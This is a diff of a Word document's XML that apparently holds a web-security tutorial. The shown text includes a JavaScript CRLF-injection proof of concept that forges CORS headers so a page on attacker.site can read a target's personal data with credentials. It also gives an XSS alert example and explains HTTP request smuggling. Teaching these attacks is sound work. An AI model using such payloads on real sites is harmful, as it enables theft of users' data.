+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12726,7 +14234,35 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>function loadXMLDoc()</w:t>
+        <w:t xml:space="preserve">function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>loadXMLDoc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12772,7 +14308,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>var xmlhttp;</w:t>
+        <w:t xml:space="preserve">var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12789,6 +14343,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
@@ -12796,7 +14351,34 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>xmlhttp=new XMLHttpRequest();</w:t>
+        <w:t>xmlhttp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12813,13 +14395,25 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>xmlhttp.withCredentials = true;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.withCredentials</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = true;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12836,13 +14430,25 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>xmlhttp.onreadystatechange=function()</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.onreadystatechange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=function()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12888,7 +14494,45 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>if (xmlhttp.readyState==4 &amp;&amp; xmlhttp.status==200)</w:t>
+        <w:t>if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.readyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==4 &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.status</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>==200)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12928,13 +14572,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>document.getElementById("responseDiv").innerHTML=xmlhttp.responseText;</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>document.getElementById</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>("responseDiv").innerHTML=xmlhttp.responseText;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12997,13 +14651,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>xmlhttp.open("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccessControl-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-AllowCredentials:%20true",true);</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.open</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccessControl-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-AllowCredentials:%20true",true);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13020,13 +14684,25 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>xmlhttp.send();</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xmlhttp.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13043,13 +14719,32 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>}&lt;/scr</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>}&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13065,7 +14760,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t&gt;</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13087,7 +14791,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>to access the stolen data. Under normal conditions, evil.php would not be able to read the response content until we bypass to the Same Origin Policy.</w:t>
+        <w:t xml:space="preserve">to access the stolen data. Under normal conditions, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>evil.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> would not be able to read the response content until we bypass to the Same Origin Policy.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13286,7 +15006,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Add page content with an XSS: &lt;scr</w:t>
+        <w:t>Add page content with an XSS: &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13302,7 +15031,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t&gt;alert(1)&lt;/scr</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13318,7 +15083,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t&gt;. This content has exactly 25 bytes.</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;. This content has exactly 25 bytes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13887,19 +15661,10 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>What is HTTP Request Smuggling</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:before="375" w:after="225"/>
-        <w:jc w:val="both"/>
+        <w:t xml:space="preserve">What is HTTP Request </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
@@ -13907,16 +15672,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
+        <w:t>Smuggling</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -13931,6 +15695,19 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:t>HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="375" w:after="225"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
@@ -13938,8 +15715,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keep-Alive and p</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -13948,8 +15724,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>IP</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Keep-Alive and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -13958,8 +15735,29 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>IP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>elining</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13983,7 +15781,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The Keep-Alive header is a hop-by-hop header that provides information about a persistent connection. In web servers, Keep-Alive can be specified within the “Connection” header which allows a web server to keep a TCP socket/connection open. By using this header, mult</w:t>
+        <w:t xml:space="preserve">The Keep-Alive header is a hop-by-hop header that provides information about a persistent connection. In web servers, Keep-Alive can be specified within the “Connection” header which allows a web server to keep a TCP socket/connection open. By using this header, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mult</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13999,7 +15806,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>le requests and responses can use a single connection which can reduce overhead and improve performance for a web server. This feature is supported by all browsers and servers today.</w:t>
+        <w:t>le</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> requests and responses can use a single connection which can reduce overhead and improve performance for a web server. This feature is supported by all browsers and servers today.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14020,6 +15836,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -14042,7 +15859,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">elining is another feature that was introduced in RFC 2616. This allows a web server to process requests asynchronously—as a first-in-first-out stream rather than processing each request individually, allowing it to send a request without waiting for a previous response to arrive.  </w:t>
+        <w:t>elining</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is another feature that was introduced in RFC 2616. This allows a web server to process requests asynchronously—as a first-in-first-out stream rather than processing each request individually, allowing it to send a request without waiting for a previous response to arrive.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14368,8 +16194,20 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Content-lengh</w:t>
-      </w:r>
+        <w:t>Content-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>lengh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14393,7 +16231,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The Content-Length, , is an HTTP header that indicates the size of the entity-body of the request</w:t>
+        <w:t>The Content-Length</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is an HTTP header that indicates the size of the entity-body of the request</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14517,8 +16373,17 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
         </w:rPr>
-        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
-      </w:r>
+        <w:t>Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14721,8 +16586,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
-      </w:r>
+        <w:t>Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14905,7 +16780,25 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:tab/>
-        <w:t>(0 to terminate request followed by rn)</w:t>
+        <w:t xml:space="preserve">(0 to terminate request followed by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14947,7 +16840,25 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:tab/>
-        <w:t>(rn)</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14972,7 +16883,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>HTTP Request Smuggling.is a security exploit on the HTTP protocol , Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.</w:t>
+        <w:t xml:space="preserve">HTTP Request Smuggling.is a security exploit on the HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>protocol ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15023,7 +16952,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP request and man</w:t>
+        <w:t xml:space="preserve">Request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP request and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>man</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15039,7 +16977,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>ulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers</w:t>
+        <w:t>ulating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15063,7 +17010,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>There are also different variations of Request Smuggling, which are known by the abbreviations symbolising the headers used in the attack. These are: CL:CL CL:TE TE:TE and TE:CL. The CL stands for the header value Content-Length and the TE value stands for the header Transfer-Encoding</w:t>
+        <w:t xml:space="preserve">There are also different variations of Request Smuggling, which are known by the abbreviations </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
